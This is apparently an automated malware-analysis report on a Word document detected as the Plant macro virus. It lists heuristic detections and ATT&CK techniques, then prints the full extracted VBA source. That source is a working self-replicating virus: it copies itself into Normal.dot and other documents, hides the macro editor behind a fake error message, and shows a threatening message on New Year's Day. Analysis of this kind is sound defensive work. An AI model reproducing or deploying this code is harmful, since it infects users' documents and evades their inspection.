MALICIOUS
Risk Score: 256
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, including AutoOpen and AutoExec functions, which are indicative of malicious intent. The AutoOpen macro attempts to copy itself and potentially a payload named 'Plant.doc' to program directories, and the AutoExec macro displays a message indicating infection by 'Plant.Virus'. The VBA code also attempts to tamper with itself by writing VBA project code, suggesting self-replication or anti-analysis techniques.
Heuristics 6
- ClamAV: Doc.Trojan.Plant-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Plant-1
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Application.OrganizerCopy _
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: Sub AutoOpen()
- Auto_Close macro [low] OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2785 bytes |

SHA-256: 086c185711248e78bf56f83180349017291e80419ee2ec32fae60c1fe4d3e192
Detection:
- ClamAV: Doc.Trojan.Plant-1
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FServPlant"
'
' Please, don't delete it, if you are not sure.
'
Sub AutoExec()
On Error GoTo ErrorInSub
CommandBars("Visual Basic").Enabled = False
If DateTime.Day(DateTime.Date) = 1 _
And DateTime.Month(DateTime.Date) = 1 Then MsgBox _
prompt:="Happy NewYear ! You are infected by Plant.Virus. " + _
"Don't panic, i'm KILL you.", _
buttons:=vbExclamation, _
Title:="Plant Information"
ErrorInSub:
End Sub
Sub AutoOpen()
fName = ActiveDocument.Name
fFullName = ActiveDocument.FullName
nPath = Options.DefaultFilePath(wdUserTemplatesPath)
sPath = Options.DefaultFilePath(wdProgramPath)
On Error GoTo ErrorInSub
If FileSystem.Dir(sPath + "\Plant.doc", vbNormal) = _
"Plant.doc" Then GoTo FindMainFile
ActiveDocument.SaveAs FileName:=sPath + "\" + fName
ActiveDocument.SaveAs FileName:=fFullName
Name sPath + "\" + fName As sPath + "\Plant.doc"
AutoExec
FindMainFile:
CopyMacros nSource:=fFullName, nDestination:=nPath + "\Normal.dot"
ErrorInSub:
End Sub
Sub FileOpen()
On Error GoTo ErrorInSub
Dialogs(wdDialogFileOpen).Show
ErrorInSub:
End Sub
Sub AutoClose()
fFullName = ActiveDocument.FullName
sPath = Options.DefaultFilePath(wdProgramPath)
On Error GoTo ErrorInSub
CopyMacros nSource:=sPath + "\Plant.doc", nDestination:=fFullName
ErrorInSub:
End Sub
Sub ViewVBCode()
On Error GoTo ErrorInSub
VBNotToday
ErrorInSub:
End Sub
Sub ToolsMacro()
On Error GoTo ErrorInSub
VBNotToday
ErrorInSub:
End Sub
Sub Organizer()
On Error GoTo ErrorInSub
VBNotToday
ErrorInSub:
End Sub
Sub ToolsRecordMacroStart()
On Error GoTo ErrorInSub
VBNotToday
ErrorInSub:
End Sub
Sub ToolsRecordMacroToggle()
On Error GoTo ErrorInSub
VBNotToday
ErrorInSub:
End Sub
Private Sub CopyMacros(nSource, nDestination)
On Error GoTo ErrorInSub
Application.OrganizerCopy _
Source:=nSource, _
Destination:=nDestination, _
Name:="FServPlant", _
Object:=wdOrganizerObjectProjectItems
ErrorInSub:
End Sub
Private Sub VBNotToday()
On Error GoTo ErrorInSub
MsgBox _
prompt:="Microsoft Visual Basic is not installed. " + _
"Please refer to the online help or documentation of the " + _
"host application to determine how to install " + _
"Microsoft Visual Basic.", _
buttons:=vbExclamation, Title:="Microsoft Visual Basic"
ErrorInSub:
End Sub